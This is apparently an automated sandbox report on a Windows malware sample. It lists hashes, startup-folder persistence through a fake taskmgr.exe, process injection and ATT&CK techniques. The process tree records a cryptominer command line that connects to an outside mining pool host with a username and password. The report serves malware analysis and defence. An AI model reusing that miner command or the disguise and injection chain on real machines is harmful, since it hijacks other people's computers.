8ade36ca05b733841f178b46dabeefcd3cadb0d91ce83e0e313b68376c75189c

Analysis

max time kernel
144s
max time network
119s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
27-07-2024 08:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7781c1145869cdf87cf61d671247e80e_JaffaCakes118.exe
Size

379KB
MD5

7781c1145869cdf87cf61d671247e80e
SHA1

e2f76f546d3e4ff3e748fb6d4b1b3d2890c3b1da
SHA256

8ade36ca05b733841f178b46dabeefcd3cadb0d91ce83e0e313b68376c75189c
SHA512

6d1767dc3ef0751f7a1d4c4b43d621a48a06124780e57393e5a5a8039d66a90468e8ba09a44210d02e63ab06c0bb367755f43220c9c265f2a3c5bf1ad9cdf776
SSDEEP

6144:Lu2urzh9xu/XkauJza8em0Xs0anV3Ve1h3yU1OIGtNAkoIaNOBG29J8YLj4UdC/P:Lutrzh9xOXkFa8em0X0V3U1hx1OIGtNQ

Score

7^/10

discovery

Malware Config

Signatures

Drops startup file 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\__tmp_rar_sfx_access_check_259417900	7781c1145869cdf87cf61d671247e80e_JaffaCakes118.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\taskmgr.exe	7781c1145869cdf87cf61d671247e80e_JaffaCakes118.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\taskmgr.exe	7781c1145869cdf87cf61d671247e80e_JaffaCakes118.exe

Executes dropped EXE 3 IoCs

pid	Process
2464	taskmgr.exe
2764	taskmgr.exe
3000	taskmgr.exe

Loads dropped DLL 12 IoCs

pid	Process
2848	7781c1145869cdf87cf61d671247e80e_JaffaCakes118.exe
2464	taskmgr.exe
2464	taskmgr.exe
2464	taskmgr.exe
2464	taskmgr.exe
2764	taskmgr.exe
2764	taskmgr.exe
2764	taskmgr.exe
2764	taskmgr.exe
3000	taskmgr.exe
3000	taskmgr.exe
3000	taskmgr.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2464 set thread context of 2764	2464	taskmgr.exe	31
PID 2764 set thread context of 3000	2764	taskmgr.exe	32

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7781c1145869cdf87cf61d671247e80e_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskmgr.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2464	taskmgr.exe
2464	taskmgr.exe
2464	taskmgr.exe

Suspicious use of WriteProcessMemory 27 IoCs

description	pid	Process	procid_target
PID 2848 wrote to memory of 2464	2848	7781c1145869cdf87cf61d671247e80e_JaffaCakes118.exe	30
PID 2848 wrote to memory of 2464	2848	7781c1145869cdf87cf61d671247e80e_JaffaCakes118.exe	30
PID 2848 wrote to memory of 2464	2848	7781c1145869cdf87cf61d671247e80e_JaffaCakes118.exe	30
PID 2848 wrote to memory of 2464	2848	7781c1145869cdf87cf61d671247e80e_JaffaCakes118.exe	30
PID 2848 wrote to memory of 2464	2848	7781c1145869cdf87cf61d671247e80e_JaffaCakes118.exe	30
PID 2848 wrote to memory of 2464	2848	7781c1145869cdf87cf61d671247e80e_JaffaCakes118.exe	30
PID 2848 wrote to memory of 2464	2848	7781c1145869cdf87cf61d671247e80e_JaffaCakes118.exe	30
PID 2464 wrote to memory of 2764	2464	taskmgr.exe	31
PID 2464 wrote to memory of 2764	2464	taskmgr.exe	31
PID 2464 wrote to memory of 2764	2464	taskmgr.exe	31
PID 2464 wrote to memory of 2764	2464	taskmgr.exe	31
PID 2464 wrote to memory of 2764	2464	taskmgr.exe	31
PID 2464 wrote to memory of 2764	2464	taskmgr.exe	31
PID 2464 wrote to memory of 2764	2464	taskmgr.exe	31
PID 2464 wrote to memory of 2764	2464	taskmgr.exe	31
PID 2464 wrote to memory of 2764	2464	taskmgr.exe	31
PID 2764 wrote to memory of 3000	2764	taskmgr.exe	32
PID 2764 wrote to memory of 3000	2764	taskmgr.exe	32
PID 2764 wrote to memory of 3000	2764	taskmgr.exe	32
PID 2764 wrote to memory of 3000	2764	taskmgr.exe	32
PID 2764 wrote to memory of 3000	2764	taskmgr.exe	32
PID 2764 wrote to memory of 3000	2764	taskmgr.exe	32
PID 2764 wrote to memory of 3000	2764	taskmgr.exe	32
PID 2764 wrote to memory of 3000	2764	taskmgr.exe	32
PID 2764 wrote to memory of 3000	2764	taskmgr.exe	32
PID 2764 wrote to memory of 3000	2764	taskmgr.exe	32
PID 2764 wrote to memory of 3000	2764	taskmgr.exe	32

C:\Users\Admin\AppData\Local\Temp\7781c1145869cdf87cf61d671247e80e_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\7781c1145869cdf87cf61d671247e80e_JaffaCakes118.exe"
1⤵
- Drops startup file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2848
- C:\Users\Admin\Start Menu\Programs\Startup\taskmgr.exe
  "C:\Users\Admin\Start Menu\Programs\Startup\taskmgr.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2464
- - C:\Users\Admin\Start Menu\Programs\Startup\taskmgr.exe
    "C:\Users\Admin\Start Menu\Programs\Startup\taskmgr.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2764
  - - C:\Users\Admin\Start Menu\Programs\Startup\taskmgr.exe
      mine.exe -a 59 -o http://hdzx.aquarium-stakany.org:8332/ -u redem_guild -p ludaxxxkxx
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:3000

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\taskmgr.exe

Filesize
806KB

MD5
47cfdf331a80b2028a1b8aca61bd191b

SHA1
d10bd40a735c6efbfa4fbfa6c842b4db5dba9445

SHA256
c1a6cb5e7d001839c2ce9d368aacf34767867bce2309f9d28de95c7985a6cd1d

SHA512
9ece7f127ddc29285214e7386951335719242a35001bc54c80aceb07c60f185b1eb6dce74a3b05760aec540888b529e73388f0d8ee26d4a41e3b54588e351a0d

Download Submit
memory/2464-25-0x0000000000400000-0x000000000049B000-memory.dmp

Filesize
620KB

Download
memory/2464-8-0x0000000000400000-0x000000000049B000-memory.dmp

Filesize
620KB

Download
memory/2464-12-0x0000000000360000-0x00000000003FB000-memory.dmp

Filesize
620KB

Download
memory/2464-15-0x0000000000400000-0x000000000049B000-memory.dmp

Filesize
620KB

Download
memory/2764-32-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2764-81-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2764-62-0x0000000002210000-0x00000000022AB000-memory.dmp

Filesize
620KB

Download
memory/2764-31-0x00000000009B0000-0x0000000000A4B000-memory.dmp

Filesize
620KB

Download
memory/2764-30-0x00000000009B0000-0x0000000000A4B000-memory.dmp

Filesize
620KB

Download
memory/2764-20-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2764-24-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2764-18-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2764-34-0x0000000002210000-0x00000000022AB000-memory.dmp

Filesize
620KB

Download
memory/2764-61-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2764-87-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2764-85-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2764-83-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2764-16-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2764-79-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2764-77-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2764-75-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2764-73-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2764-71-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2764-69-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2764-67-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2764-57-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2764-58-0x00000000009B0000-0x0000000000A4B000-memory.dmp

Filesize
620KB

Download
memory/2764-64-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2764-60-0x00000000009B0000-0x0000000000A4B000-memory.dmp

Filesize
620KB

Download
memory/2848-6-0x00000000035C0000-0x000000000365B000-memory.dmp

Filesize
620KB

Download
memory/3000-35-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/3000-63-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/3000-59-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/3000-65-0x0000000000310000-0x00000000003AB000-memory.dmp

Filesize
620KB

Download
memory/3000-66-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/3000-52-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/3000-68-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/3000-53-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/3000-70-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/3000-50-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/3000-72-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/3000-55-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/3000-74-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/3000-49-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/3000-76-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/3000-51-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/3000-78-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/3000-45-0x00000000004FD000-0x0000000000537000-memory.dmp

Filesize
232KB

Download
memory/3000-80-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/3000-37-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/3000-82-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/3000-39-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/3000-84-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/3000-42-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/3000-86-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/3000-44-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/3000-88-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download